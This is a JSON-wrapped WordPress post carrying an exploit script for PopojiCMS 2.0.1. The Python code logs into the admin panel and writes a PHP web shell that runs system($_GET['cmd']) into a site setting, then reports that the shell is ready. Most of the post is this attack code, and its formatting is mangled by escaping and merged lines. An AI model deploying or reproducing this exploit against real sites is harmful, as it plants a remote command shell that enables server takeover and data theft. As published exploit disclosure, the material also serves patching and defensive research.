# Exploit Title: PopojiCMS 2.0.1 – Remote Command Execution
# Date: 14\/04\/2024
# Exploit Author: Ahmet \u00dcmit BAYRAM
# Vendor Homepage: https:\/\/www.popojicms.org\/
# Software Link:
https:\/\/github.com\/PopojiCMS\/PopojiCMS\/archive\/refs\/tags\/v2.0.1.zip
# Version: Version : 2.0.1
# Tested on: https:\/\/www.softaculous.com\/apps\/cms\/PopojiCMS<\/p>\n
import requests
import time
import sys<\/p>\n
def exploit(url, username, password):<\/p>\n
login_url = f”{url}\/po-admin\/route.php?mod=login&act=proclogin”
login_data = {“username”: username, “password”: password}
headers = {“Content-Type”: “application\/x-www-form-urlencoded”, “Referer”: f
“{url}\/po-admin\/index.php”}
session = requests.Session()
login_response = session.post(login_url, data=login_data, headers=headers)
if “Administrator PopojiCMS” in login_response.text:
print(“Login Successful!”)
time.sleep(1) # 1 saniye bekle
else:
print(“Login Failed!”)
return<\/p>\n
edit_url = f”{url}\/po-admin\/route.php?mod=setting&act=metasocial”
edit_data = {“meta_content”: “””<html>
<body>
<form method=”GET” name=”<?php echo basename($_SERVER[‘PHP_SELF’]); ?>”>
<input type=”TEXT” name=”cmd” autofocus id=”cmd” size=”80″>
<input type=”SUBMIT” value=”Execute”>
<\/form>
<pre>
<?php
if(isset($_GET[‘cmd’]))
{
system($_GET[‘cmd’]);
}
?>
<\/pre>
<\/body>
<\/html>”””}
edit_response = session.post(edit_url, data=edit_data, headers=headers)
if “cmd” in edit_response.text:
print(“Your shell is ready:”, url)
time.sleep(1)
else:
print(“Exploit Failed!”)
return<\/p>\n
if __name__ == “__main__”:
if len(sys.argv) != 4:
print(“Kullan\u0131m: python exploit.py sitename username password”)
sys.exit(1)<\/p>\n
url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]print(“Exploiting…”)
time.sleep(1)
print(“Logging in…”)
time.sleep(1)
exploit(url, username, password)<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: PopojiCMS 2.0.1 – Remote Command Execution# Date: 14\/04\/2024# Exploit Author: Ahmet \u00dcmit BAYRAM# Vendor Homepage: https:\/\/www.popojicms.org\/# Software Link:https:\/\/github.com\/PopojiCMS\/PopojiCMS\/archive\/refs\/tags\/v2.0.1.zip# Version: Version : 2.0.1# Tested on: https:\/\/www.softaculous.com\/apps\/cms\/PopojiCMS import requestsimport timeimport sys def exploit(url, username, password): login_url = f”{url}\/po-admin\/route.php?mod=login&act=proclogin”login_data = {“username”: username, “password”: password}headers = {“Content-Type”: “application\/x-www-form-urlencoded”, “Referer”: f“{url}\/po-admin\/index.php”}session = requests.Session()login_response = session.post(login_url, data=login_data, headers=headers)if …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56942","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56942","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56942"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56942\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56942"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56942"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56942"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}